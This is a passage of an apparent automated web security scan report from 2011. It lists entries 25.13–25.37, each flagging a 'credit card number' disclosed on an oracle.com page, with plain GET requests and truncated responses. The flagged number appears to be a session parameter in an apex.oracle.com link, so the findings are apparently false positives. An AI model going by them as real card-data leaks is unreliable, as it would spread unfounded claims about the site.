<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','as','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.13. http://www.oracle.com/as/corporate/contact/maldives-316209-en-as.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /as/corporate/contact/maldives-316209-en-as.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /as/corporate/contact/maldives-316209-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35764036328879253,0:1)
Date: Tue, 06 Sep 2011 16:17:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','as','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.14. http://www.oracle.com/as/corporate/contact/nepal-316215-en-as.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /as/corporate/contact/nepal-316215-en-as.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /as/corporate/contact/nepal-316215-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41171065147094656,0:1)
Date: Tue, 06 Sep 2011 16:17:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','as','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.15. http://www.oracle.com/as/corporate/contact/pakistan-316185-en-as.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /as/corporate/contact/pakistan-316185-en-as.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /as/corporate/contact/pakistan-316185-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=0;ecid=41104347125119295,0:1)
Date: Tue, 06 Sep 2011 16:17:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','as','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.16. http://www.oracle.com/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=0;ecid=35807978136234850,0:1)
Content-Length: 138644
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:53:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.17. http://www.oracle.com/technetwork/apps-tech/index-095827.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/apps-tech/index-095827.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/apps-tech/index-095827.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41155766473119038,0:1)
Date: Tue, 06 Sep 2011 16:09:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123036

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.18. http://www.oracle.com/technetwork/apps-tech/index-097651.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/apps-tech/index-097651.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/apps-tech/index-097651.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35983045300771156,0:1)
Date: Tue, 06 Sep 2011 16:09:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128917

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.19. http://www.oracle.com/technetwork/apps-tech/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/apps-tech/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/apps-tech/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41074097669987687,0:1)
Date: Tue, 06 Sep 2011 16:09:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129018

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.20. http://www.oracle.com/technetwork/architect/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/architect/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/architect/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41155972631552464,0:1)
Date: Tue, 06 Sep 2011 16:09:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.21. http://www.oracle.com/technetwork/articles/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/articles/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/articles/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=35925501328067259,0:1)
Date: Tue, 06 Sep 2011 16:09:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132727

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.22. http://www.oracle.com/technetwork/community/developer-vm/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/community/developer-vm/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/community/developer-vm/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41112056590278304,0:1)
Date: Tue, 06 Sep 2011 16:09:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134004

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.23. http://www.oracle.com/technetwork/community/join/overview/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/community/join/overview/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/community/join/overview/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41074239403910534,0:1)
Date: Tue, 06 Sep 2011 16:09:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126796

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.24. http://www.oracle.com/technetwork/community/oracle-ace/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/community/oracle-ace/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/community/oracle-ace/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35656713684448957,0:1)
Date: Tue, 06 Sep 2011 16:09:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132855

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.25. http://www.oracle.com/technetwork/database/berkeleydb/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/database/berkeleydb/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/database/berkeleydb/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35925342414274979,0:1)
Date: Tue, 06 Sep 2011 16:09:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140848

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.26. http://www.oracle.com/technetwork/database/enterprise-edition/documentation/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/database/enterprise-edition/documentation/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/database/enterprise-edition/documentation/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=273;ecid=35983324473649698,0:1)
Date: Tue, 06 Sep 2011 16:09:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131559

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.27. http://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/database/enterprise-edition/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/database/enterprise-edition/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=235;ecid=41084439950149140,0:1)
Date: Tue, 06 Sep 2011 16:09:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 179935

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.28. http://www.oracle.com/technetwork/database/enterprise-edition/overview/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/database/enterprise-edition/overview/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/database/enterprise-edition/overview/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=172;ecid=41037921159891880,0:1)
Date: Tue, 06 Sep 2011 16:09:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 138701

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.29. http://www.oracle.com/technetwork/database/express-edition/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/database/express-edition/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/database/express-edition/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35640160880236192,0:1)
Date: Tue, 06 Sep 2011 16:09:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 147785

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.30. http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/database/features/instant-client/index-097480.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/database/features/instant-client/index-097480.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=35983345948486604,0:1)
Date: Tue, 06 Sep 2011 16:09:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129536

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.31. http://www.oracle.com/technetwork/database/windows/downloads/index-101290.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/database/windows/downloads/index-101290.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/database/windows/downloads/index-101290.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41156226034626734,0:1)
Date: Tue, 06 Sep 2011 16:09:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 198382

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.32. http://www.oracle.com/technetwork/dbadev/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/dbadev/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/dbadev/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=40971220316785020,0:1)
Date: Tue, 06 Sep 2011 16:09:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.33. http://www.oracle.com/technetwork/developer-tools/apex/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/developer-tools/apex/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/developer-tools/apex/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41118116789228163,0:1)
Date: Tue, 06 Sep 2011 16:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139792

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.34. http://www.oracle.com/technetwork/developer-tools/eclipse/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/developer-tools/eclipse/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/developer-tools/eclipse/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=271;ecid=41051115299626626,0:1)
Date: Tue, 06 Sep 2011 16:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133089

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.35. http://www.oracle.com/technetwork/developer-tools/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/developer-tools/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/developer-tools/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=6;ecid=35935177889533234,0:1)
Date: Tue, 06 Sep 2011 16:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137646

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.36. http://www.oracle.com/technetwork/developer-tools/jdev/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/developer-tools/jdev/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/developer-tools/jdev/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=270;ecid=41074600181168427,0:1)
Date: Tue, 06 Sep 2011 16:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 163042

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.37. http://www.oracle.com/technetwork/developer-tools/sql-developer/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/developer-tools/sql-developer/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/developer-tools/sql-developer/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=184;ecid=41076300987227916,0:1)
Date: Tue, 06 Sep 2011 16:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 153665

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
